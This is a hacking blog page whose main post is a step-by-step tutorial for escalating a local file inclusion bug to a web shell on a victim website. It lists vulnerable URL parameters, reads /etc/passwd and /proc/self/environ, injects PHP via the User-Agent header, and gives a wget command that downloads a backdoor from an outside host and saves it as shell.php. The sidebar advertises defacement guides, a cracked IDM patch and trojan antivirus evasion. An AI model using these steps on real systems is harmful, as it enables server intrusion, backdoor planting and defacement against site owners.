• Server Hacking

    Finally i am releasing Server Hacking video with the script for all my readers who have been waiting from some time for this... Your wait is over here it is

  • How To Hack - /cgi-sys/suspendedpage.cgi ~ Video Tutorial

    Many times you found that hacker posts the deface index with "/cgi-sys/suspendedpage.cgi" link e.g. www.site.com/cgi-sys/suspendedpage.cgi So, today we will learn how to do this..

  • |IDM 6.10 + PATCH

    Internet Download Manager (IDM) is a tool to increase download speeds by up to 5 times, resume and schedule downloads. Comprehensive....

  • Root and Unroot Android Phone

    Getting the ROOT of the rights and removing them to the Galaxy Ace Samsung GT-S5830 IRoot Instructions for obtaining the right. ...

  • FUD Your Trojan

    File splitter to split our servers to find out where the virus signature is to modify it. ...

LFI TO SHELL WITH VIDEO TUT

Posted by Anonymous On 11:36 No comments



||VIDEO TUT||


HELLO GUYS I HAVE ALREADY POSTED TUT ON LFI TO SHELL YOU CAN SEE IT HERE
TODAY ILL AGAIN POST IT WITH VIDEO
Here are some of the common parameters which are vulnerable to local file inclusion or remote file inclusion attacks.


index.php?homepage=
index.php?page=
index.php?index2=

Requirements:

1) A Vulnerable Website
2) Remote shell ( http://www.sh3ll.org/egy.txt )
4) Mozilla Firefox

The first thing which a hacker will do while finding a LFI vulnerability is to locate the /etc/passwd file. This file indicates that a local file inclusion vulnerability is present in the website. The image below explains the whole story “root” is the username, followed by “x” which happens to be the password, however here it’s shadowed, which means that it’s present is /etc/shadow file. Which is only accessible when you have root privileges.






Next the hacker will check for /proc/self/environ. So change your path to /proc/self/environ/. The/proc/self/environ/ page should look something like this if the file exists, not all sites have it.



Once the local file inclusion vulnerability has been identified , the hacker will try to perform remote code execution and try to some how to further acesss. This can be done by uploading a PHP backdoor. For that purpose a commonly used tool is Useragent switcher. Which can be downloaded from the link above.



The hacker edits the useragent and changes code inside to the user agent to the following:

<?php phpinfo();?>

Select your User-Agent in Tools > Default User Agent > PHP Info (Or whatever you User Agent is called)




After refreshing the website, He then searches for the keyword "disable_functions" (Ctrl+F Search function)

disable_functions | no value | no value



The above function tells us that website is vulnerable to remote code execution and now we can upload the PHP backdoor. On the finding that the website is vulnerable he then tries to upload the shell by using the following command:

<?exec('wget http://www.sh3ll.org/egy.txt -O shell.php');?>

Where the above code uploads a PHP backdoor in a text form and later renames it to .php. Now the shell has been successfully uploaded. Once the PHP backdoor has been uploaded it will look like the following:

 


Scource:- Hackerzadda   (Note :- All Copy are done with the permission of administrator so no copyright law will not applied on us.)

Categories: , , , ,

0 comments:

Post a Comment

Site search